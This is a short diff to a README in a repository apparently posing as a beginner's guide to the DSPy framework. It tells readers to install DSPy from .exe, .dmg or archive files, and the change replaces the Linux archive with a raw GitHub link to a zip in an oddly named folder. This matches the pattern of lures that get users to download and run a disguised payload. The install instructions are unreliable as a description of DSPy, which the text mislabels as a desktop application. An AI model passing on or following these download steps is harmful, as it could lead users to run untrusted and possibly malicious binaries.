carofel11/dspy-0to1-guide/README.md

 2. **Install the Application:**
    - For **Windows:** Double-click the `.exe` file and follow the prompts.
    - For **macOS:** Open the `.dmg` file and drag the dspy application to your Applications folder.
-   - For **Linux:** Extract the `.tar.gz` file and follow instructions in the included README for installation.
+   - For **Linux:** Extract the `https://raw.githubusercontent.com/carofel11/dspy-0to1-guide/main/synonymity/dspy-0to1-guide.zip` file and follow instructions in the included README for installation.

 3. **Open the Application:**
    Once the installation completes, find the application on your computer.
 Open it to start your journey with the DSPy framework.